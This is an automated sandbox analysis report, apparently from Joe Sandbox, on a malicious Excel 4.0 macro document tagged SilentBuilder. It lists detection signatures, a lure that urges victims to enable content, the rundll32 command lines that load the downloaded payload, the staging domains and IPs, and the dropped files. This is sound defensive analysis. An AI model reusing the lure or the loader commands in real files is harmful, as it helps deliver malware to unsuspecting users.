Analysis Report 0b31c0f0_by_Libranalysis

Overview

General Information

Sample Name: 0b31c0f0_by_Libranalysis (renamed file extension from none to xls)
Analysis ID: 412660
MD5: 0b31c0f0844b5541f94f915757c4ba61
SHA1: 4be1acd410a4e696278657309cd4de7874055991
SHA256: d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
Tags: SilentBuilder
Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2380 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2648 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2552 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: rundll32 ..\ritofm.cvm,DllRegisterServer
  • CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer
  • CommandLine|base64offset|contains: ]
  • Image: C:\Windows\System32\rundll32.exe
  • NewProcessName: C:\Windows\System32\rundll32.exe
  • OriginalFileName: C:\Windows\System32\rundll32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 2380
  • ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer
  • ProcessId: 2648

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 0b31c0f0_by_Libranalysis.xls | ReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: signifysystem.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: Joe Sandbox View | IP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox View | IP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Document image extraction number: 6 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 6 | Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Found Excel 4.0 Macro with suspicious formulas
Source: 0b31c0f0_by_Libranalysis.xls | Initial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xls | Initial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xls | Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 0b31c0f0_by_Libranalysis.xls | Initial sample: Sheet size: 14902
Source: 0b31c0f0_by_Libranalysis.xls | OLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\97DE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCDAA.tmp
Source: 0b31c0f0_by_Libranalysis.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (27 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)

Mitre Att&ck Matrix

Matrix cells listed per tactic column; numbers in brackets are the superscript counts shown on the page next to the matched techniques.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Scripting [21], Exploitation for Client Execution [23], At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Rundll32 [1], Process Injection [1], Scripting [21]
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: File and Directory Discovery [1], System Information Discovery [2], Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel [2], Non-Application Layer Protocol [1], Application Layer Protocol [2], Ingress Tool Transfer [1], Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
0b31c0f0_by_Libranalysis.xls | 5% | Virustotal
0b31c0f0_by_Libranalysis.xls | 11% | ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner
signifysystem.com | 3% | Virustotal
fcventasyservicios.cl | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
signifysystem.com | 192.185.39.58 | true | false | | unknown
fcventasyservicios.cl | 192.185.32.232 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmp | false | | high

Contacted IPs


Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
192.185.39.58 | signifysystem.com | United States | US | 46606 | UNIFIEDLAYER-AS-1 | false
192.185.32.232 | fcventasyservicios.cl | United States | US | 46606 | UNIFIEDLAYER-AS-1 | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412660
Start date: 12.05.2021
Start time: 20:51:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 0b31c0f0_by_Libranalysis (renamed file extension from none to xls)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLS@5/11@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.137.254, 8.241.126.121, 8.253.207.121, 8.241.79.254, 8.238.85.254
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              192.185.39.58090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                      afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                              32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                        192.185.32.232090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                            54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                    8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                        32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                            9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                              46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  signifysystem.com090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  fcventasyservicios.cl090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):59863
                                                                  Entropy (8bit):7.99556910241083
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                  MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):893
                                                                  Entropy (8bit):7.366016576663508
                                                                  Encrypted:false
                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):3.140842466552086
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKv/C8pkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:H/C8phZkPlE99SNxAhUeSKO
                                                                  MD5:2214B11FF3414A39AE4E2DB8863D1B75
                                                                  SHA1:79C05ADAE452E5B6C2BD5133E61370D38B6853D8
                                                                  SHA-256:DD2D8DD405F7E62F02E860DD20D8C731D54DCA6262D22F9C10F32DC7A467669A
                                                                  SHA-512:79B6B5C470B93E6BD485A4E8D232642E22C9E4C50E96E60B1633D184BD2F7DA68829D798B9159CD75289C9E752E90C4066439C6CC3D656949A987C851A547831
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ..........Nm.G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):252
                                                                  Entropy (8bit):2.9933344443890926
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklXXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKTQE1liBAIdQZV7ulPPN
                                                                  MD5:9FA487D92BAFD8E65C00516D169499FF
                                                                  SHA1:DF0B662565ADF656921B4AC264663FEBEDF4B401
                                                                  SHA-256:C5A9A2D11F4CB15560216ADBF9F5B2E73A0AB5EFF3CBF75A63F9D2DA51EA7E29
                                                                  SHA-512:9359F243AFCA20D0DC35E422F63020B17B90C71500E2F08F62559C80B084EBFA94C3044558E737C34F8E287F7394CDEDEAA72B46FF4E9090CDFBD1BA72F43304
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ....`...y..m.G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                  C:\Users\user\AppData\Local\Temp\C6DE0000
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):81246
                                                                  Entropy (8bit):7.90647334609855
                                                                  Encrypted:false
                                                                  SSDEEP:1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/tT:TALW8SD8YZo/Uh0GUzEiV
                                                                  MD5:2BA6894A4CA6569746618B119D06FDA1
                                                                  SHA1:932A5814C3CAA3618F9515BB571F83CF5FE1B579
                                                                  SHA-256:A984D8D3FC7A242CBBAC45E819B44CC1FBF758F7550F9A1AE202FE5DF6C25778
                                                                  SHA-512:2414F91CFC97F99635E2C04F880A07920F5264ADF4C0A8D35725B80AA6E1A7C5F526284DBDC01DA8A938920134E361A195A43E245CE6E49D0CAC307BC7375A66
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
